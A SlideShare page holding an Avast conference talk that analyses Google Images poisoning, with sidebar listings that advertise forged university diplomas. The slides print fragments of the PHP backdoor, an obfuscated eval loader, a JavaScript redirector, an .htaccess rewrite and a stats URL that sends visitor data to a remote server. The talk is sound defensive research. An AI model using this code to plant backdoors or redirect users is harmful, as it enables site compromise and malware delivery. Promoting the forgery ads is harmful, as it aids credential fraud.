一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
ufdana
 
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
3ipehhoa
 
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
3ipehhoa
 
Latest trends in computer networking.pptx
Latest trends in computer networking.pptxLatest trends in computer networking.pptx
Latest trends in computer networking.pptx
JungkooksNonexistent
 
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
eutxy
 
guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...
Rogerio Filho
 
test test test test testtest test testtest test testtest test testtest test ...
test test test test testtest test testtest test testtest test testtest test ...test test test test testtest test testtest test testtest test testtest test ...
test test test test testtest test testtest test testtest test testtest test ...
Arif0071
 
How to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptxHow to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptx
Gal Baras
 
Internet-Security-Safeguarding-Your-Digital-World (1).pptx
Internet-Security-Safeguarding-Your-Digital-World (1).pptxInternet-Security-Safeguarding-Your-Digital-World (1).pptx
Internet-Security-Safeguarding-Your-Digital-World (1).pptx
VivekSinghShekhawat2
 
Multi-cluster Kubernetes Networking- Patterns, Projects and Guidelines
Multi-cluster Kubernetes Networking- Patterns, Projects and GuidelinesMulti-cluster Kubernetes Networking- Patterns, Projects and Guidelines
Multi-cluster Kubernetes Networking- Patterns, Projects and Guidelines
Sanjeev Rampal
 
1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...
JeyaPerumal1
 
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Brad Spiegel Macon GA
 
Comptia N+ Standard Networking lesson guide
Comptia N+ Standard Networking lesson guideComptia N+ Standard Networking lesson guide
Comptia N+ Standard Networking lesson guide
GTProductions1
 
This 7-second Brain Wave Ritual Attracts Money To You.!
This 7-second Brain Wave Ritual Attracts Money To You.!This 7-second Brain Wave Ritual Attracts Money To You.!
This 7-second Brain Wave Ritual Attracts Money To You.!
nirahealhty
 
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdfJAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
Javier Lasa
 
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
3ipehhoa
 

Recently uploaded (20)

History+of+E-commerce+Development+in+China-www.cfye-commerce.shop
History+of+E-commerce+Development+in+China-www.cfye-commerce.shopHistory+of+E-commerce+Development+in+China-www.cfye-commerce.shop
History+of+E-commerce+Development+in+China-www.cfye-commerce.shop
 
BASIC C++ lecture NOTE C++ lecture 3.pptx
BASIC C++ lecture NOTE C++ lecture 3.pptxBASIC C++ lecture NOTE C++ lecture 3.pptx
BASIC C++ lecture NOTE C++ lecture 3.pptx
 
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
 
The+Prospects+of+E-Commerce+in+China.pptx
The+Prospects+of+E-Commerce+in+China.pptxThe+Prospects+of+E-Commerce+in+China.pptx
The+Prospects+of+E-Commerce+in+China.pptx
 
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
 
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
 
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
 
Latest trends in computer networking.pptx
Latest trends in computer networking.pptxLatest trends in computer networking.pptx
Latest trends in computer networking.pptx
 
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
 
guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...
 
test test test test testtest test testtest test testtest test testtest test ...
test test test test testtest test testtest test testtest test testtest test ...test test test test testtest test testtest test testtest test testtest test ...
test test test test testtest test testtest test testtest test testtest test ...
 
How to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptxHow to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptx
 
Internet-Security-Safeguarding-Your-Digital-World (1).pptx
Internet-Security-Safeguarding-Your-Digital-World (1).pptxInternet-Security-Safeguarding-Your-Digital-World (1).pptx
Internet-Security-Safeguarding-Your-Digital-World (1).pptx
 
Multi-cluster Kubernetes Networking- Patterns, Projects and Guidelines
Multi-cluster Kubernetes Networking- Patterns, Projects and GuidelinesMulti-cluster Kubernetes Networking- Patterns, Projects and Guidelines
Multi-cluster Kubernetes Networking- Patterns, Projects and Guidelines
 
1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...
 
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
 
Comptia N+ Standard Networking lesson guide
Comptia N+ Standard Networking lesson guideComptia N+ Standard Networking lesson guide
Comptia N+ Standard Networking lesson guide
 
This 7-second Brain Wave Ritual Attracts Money To You.!
This 7-second Brain Wave Ritual Attracts Money To You.!This 7-second Brain Wave Ritual Attracts Money To You.!
This 7-second Brain Wave Ritual Attracts Money To You.!
 
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdfJAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
 
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
 

Google-image poisoning: How hackers use images to spread malware

  • 1. Analysis of Google Images Poisoning Lukáš Hasík Jan Širmer www.avast.com
  • 2. AVAR 2011 Agenda • What is Google-images poisoning? • How it works • Doorway generator • Java script redirector • Evolution • Data from AVAST CommunityIQ userbase • Summary • Questions www.avast.com
  • 3. AVAR 2011 Google Images poisoning • SEO blackhat poisoning attack • Uses hacked sites to redirect users to sites containing fake AV or exploit • Uses key-word rich pages with hot-linked images for higher indexing by search bots • Images from hacked sites are near the top search results • Focused on users coming from well-know search engines www.avast.com
  • 4. AVAR 2011 Google Images poisoning www.avast.com User Infected server How it works?
  • 5. AVAR 2011 Google search results www.avast.com
  • 6. AVAR 2011 Google Images poisoning www.avast.com User Infected server Remote serverFake AV
  • 8. AVAR 2011 Google Images poisoning www.avast.com User Infected server Remote serverFake AV Bad guy
  • 9. AVAR 2011 Why is it so successful? www.avast.com • Great SEO and nobody used SEO for “images”
  • 10. AVAR 2011 Why is it so successful? (2) www.avast.com Infected serverFake AV • Computer users do not expect that they can get infected when searching for images on legitimate sites
  • 11. AVAR 2011 Why is it so successful? (3) • Hide and Seek – if users are using Opera browser or they are coming from Google, Yahoo or a Bing, they are served a Java script redirector www.avast.com Malicious content
  • 12. AVAR 2011 Your website gets infected • The bad guys are using stolen FTP credentials • They upload PHP script to the WEB server • This is used for uploading malicious content to the web server, creating spam pages, and uploading additional files to web server • Bonus feature - it lets the owners know that the page is ready www.avast.com
  • 13. AVAR 2011 Additional malicious files • Xmlrpc.txt – Remote server address stored • -> Xml.txt -> Xml.cgi – address in Base64 • Iog.txt – Redirecting java script stored • Shab100500.txt – Spam HTML template stored • -> Don.txt – HTML template in Base64 www.avast.com
  • 14. AVAR 2011 PHP script on infected sites • Earlier, they used names such as d{1,3}.php • Today, they use names like microphone.php, etc. • This script is responsible for: 1. Creating spam pages for Google bot indexing 2. Changing .htaccess 3. Serving redirect script to user to exploit sites 4. Serving redirect script to user to fake AV 5. Downloading malicious files to server 6. Telling owners that the site is ready www.avast.com
  • 15. AVAR 2011 PHP script Original PHP file uploaded to server • <?eval (gzuncompress (base64_decode('eNqVWG2P4kYM/…/woBlZVj C9zK2Ok8McOZrF5z9hfM+5P/AbQiT9I=') ) ); ?> www.avast.com
  • 16. AVAR 2011 PHP script PHP file after first step of deobfuscation • $GLOBALS['_1600532410_']=Array(base64_dec ode('ZXJyb3Jfcm'.'Vwb3J0'.'aW5'.'n • Function _1070120820($i) {$a=Array('c'.'Q='.'=','cQ==', • ($GLOBALS['_1600532410_'][16]( _1070120820(6))) {… www.avast.com
  • 17. AVAR 2011 PHP script after removing obfuscation if (strpos($_SERVER['HTTP_USER_AGENT'], 'Opera') !== false) { } if (strpos($_SERVER['HTTP_REFERER'], 'google.') || strpos($_SERVER['HTTP_REFERER'], 'yahoo.') || strpos($_SERVER['HTTP_REFERER'], 'bing.') > 0) { $_10 = file_get_contents('.log/' . $_4 . '/xmlrpc.txt'); www.avast.com
  • 18. Doorway generator • HTML template is stored in the file .log/SITE/shab100500.txt • In the new version, shab100500.txt was replaced by don.txt www.avast.com <HTML> Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco </HTML> <Replaceme> </Replaceme>
  • 19. Doorway generator • Get descriptions of top 50 ‘search keywords’ from Google web • Shuffle the words into their descriptions to get unique text www.avast.com harmful action against a person or group in response revenge to a grievance, be it real or rick santorum perceived
  • 20. Doorway generator • Get top 20 ‘search keyword’ from Google Images and extract links to image files • Generates <img> tags and shuffle them www.avast.com <img src="http://SITE/p ath/hot-linked- image.jpg" alt="search keywords" align="random(cent er, right, left)">
  • 21. Doorway generator www.avast.com harmful action against a person or group in response revenge to a grievance, be it real or rick santorum perceived <img src="http://SITE/p ath/hot-linked- image.jpg" alt="search keywords" align="random(cent er, right, left)"> harmful action against a person or group in response revenge to a grievance<img src="http://SITE/path/hot- linked-image.jpg" alt="search keywords" align="random(center, right, left)">
  • 22. Doorway generator www.avast.com <HTML> Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco </HTML> <Replaceme> </Replaceme> <h1>SEARCH KEYWORD</h1> Suggested links Links to 30 most recently generated links Rich-word generated text with hot-linked images Links to alternative pages
  • 23. AVAR 2011 How do they make image URLs less suspicious? • "RewriteEngine On RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)$ ".$_SERVER[ 'SCRIPT_NAME'."?q=$1 [L] “ • this changes URL from suspicious http://SITE/wp-admin/BAD.php?q=search-keywords to http://SITE/wp-admin/search-keywords www.avast.com
  • 24. AVAR 2011 PHP script evolution • The first version was focused on all users using Opera browser or users coming from Google, Yahoo or Bing • During June, we found some changes in PHP code - Google is the only target - New redirection system • Request goes to a remote server ( mydiarycom.net ) - centralized • They have statistic data from parameters • No need to update iog.txt (redirecting script) or make differentiating changes on each server www.avast.com
  • 25. AVAR 2011 Data parameters http://mydiarycom.net/out/stat.cgi?parameter= 1. Name of the doorway site 2. The full URL of doorway script 3. Visitor’s IP 4. The referring URL 5. The User-Agent of the user’s browser 6. The search query used on Google www.avast.com
  • 26. AVAR 2011 IP address and user-agents www.avast.com Fake AV
  • 27. AVAR 2011 IP address and user-agents www.avast.com Spam page
  • 28. AVAR 2011 JavaScript redirector var URL = “SITE contains FakeAV” +encodeURIComponent(document.referrer) +"&parameter=$keyword&se=$se&ur=1&HTTP_REF ERER=“ +encodeURIComponent(document.URL) +"&default_keyword=default"; if (window!=top) {top.location.href = URL;} else document.location= URL; www.avast.com
  • 29. AVAR 2011 Redirection • Mac – http://IP/r/RANDOM_STRING IP and ‘r’ are change every 30 minutes • Exploit site - http://SITE/index.php?tp=RANDOM_STRING Site and ‘tp’ are change every 30 minutes • Fake AV – http://SITE/fast-scan/ www.avast.com
  • 30. AVAR 2011 Other changes • Rotating user-agent string • Password-protected maintenance request Someone who know how this algorithm works can easily change it and redirect to his or her own site • Xml.txt was replaced by xml.cgi • Working with free blogs sites www.avast.com
  • 31. AVAR 2011 Password-protected maintenance request if ($_GET[ 'dom100500' != '' { $_13 = fopen( '.log/'$_4. '/xmlrpc.txt' 'w+'; fwrite($_13,$_GET[ 'dom100500'); fclose($_13); if ($_GET[ 'up100500' != '' { $_14 = '' $_14 = $_14 . basename( $_FILES[ 'uploaded'[ 'name') ; $_15=round(0+0.5+0.5); if(move_uploaded_file($_FILES[ 'uploaded'[ 'tmp_name', $_14)) www.avast.com
  • 32. AVAR 2011 Data from the AVAST CommunityIQ • From March to August 2011, we discovered 22,580 unique infected sites • 5,698 sites are still infected • Typo : <IMG HEIGTH=?1?WIDTH www.avast.com
  • 34. AVAR 2011 Number of infected domains www.avast.com
  • 35. AVAR 2011 Summary • Google-image poisoning is an easy way how to spread fake AV and exploits • It’s based on stolen FTP credentials of webmasters and great backdoor algorithms • The number of infected legitimate domains is growing every day • Common sense is not sufficient protection www.avast.com
  • 36. AVAR 2011 Questions and Answers www.avast.com
  • 37. AVAR 2011 Thank you Jan Sirmer (sirmer@avast.com) Senior Virus Analyst Lukas Hasik (hasik@avast.com) QA Director www.avast.com

Editor's Notes

  1. predstaveni
  2. Zminit: uspesny atak (a proc), a jak “funguje” (obecne)
  3. SEO – obrazky jsou “dobre rankovane”
  4. Presmerovani na FAKE AV, managovani zarizuje remote server
  5. Jak to funguje a na koho je to zamereny Ze zacatku “nerozlisovali” OS ani browsers
  6. Co chteji bad guys? Money!
  7. Black SEO
  8. Trust phenomenon
  9. Rozdilne chovani -> predat slovo
  10. Pred rozebiranim chovani zminit JAK se nakazily “legitimate website” + pridat “pribeh”
  11. Strucne!
  12. Main PHP script + pribeh – povidani +funke skriptu jen “vyjmenovat” (nerozebirat)
  13. Jak to vypadalo nejprve, a co jsme s tim museli delat (decode)
  14. Ma to dve pole, z kterych zbuilduje vysledny skript (zadne detaily)
  15. Whole PHP script has more than 400 lines of code + rozhodovaci logika
  16. Hlavni duvod uspechu! K cemu je urcen – co pouziva (template) Template se generuje z mainpage dane “site” == jsou “nenapadny”
  17. Why we can’t find theses pages in Google results to easier detection? They used simple tag <meta name=”googlebot” content=”noarchive”> shab100500.txt contains the HTML code of the site’s homepage with the <REPLACEME> placeholder, that will be later replaced with a generated spammy block. the original <title> tag is replaced with <title>Search Keywords</title> and the <meta name=”googlebot” content=”noarchive”> tag is inserted — that’s why you don’t see cached copies of the pages in Google search results, which definitely makes the problem diagnostic more difficult for webmasters Simuluje vzhled GoogleAds -Co tam strka (vysvetlit) - <noarchive>
  18. They modify or create .htaccess with this code Script_name is the path to the uploaded .php file
  19. Probably cased by low profit from other search engines ( less chance to be found if they use only one of the three browsers) Name of remote server is stored in xml.cgi as base64 string Popsat “stary” system
  20. Jake parametry a k cemu jim slouzi
  21. Popis “redirekce”
  22. Spam page is showed for unwanted visits
  23. 1. To be less suspicious when they looking for top search keywords .cgi files produce server errors when you try to open them in directories that aren’t configured to execute CGI scripts Working with free blogs sites – posting posts with hundreds of links to doorway pages
  24.  Maintenance request: To be able to change the xml.txt(xml.cgi file in the newest version (with the domain name of the remote server)) and to use a file uploader, you now need to provide a password in the “name” parameter of a POST request. Someone who know how maintenance request works could change it to redirection on own site. this request updates the content of the xmlrpc.txt file with the domain name of a malicious server that hosts fresh redirect code. ?up100500=<some-value> – this request turns the script into an upload form.
  25. We are blocking 174 sites used for attack – Of course we have different more sofisticated detections
  26. This is based on Google blocking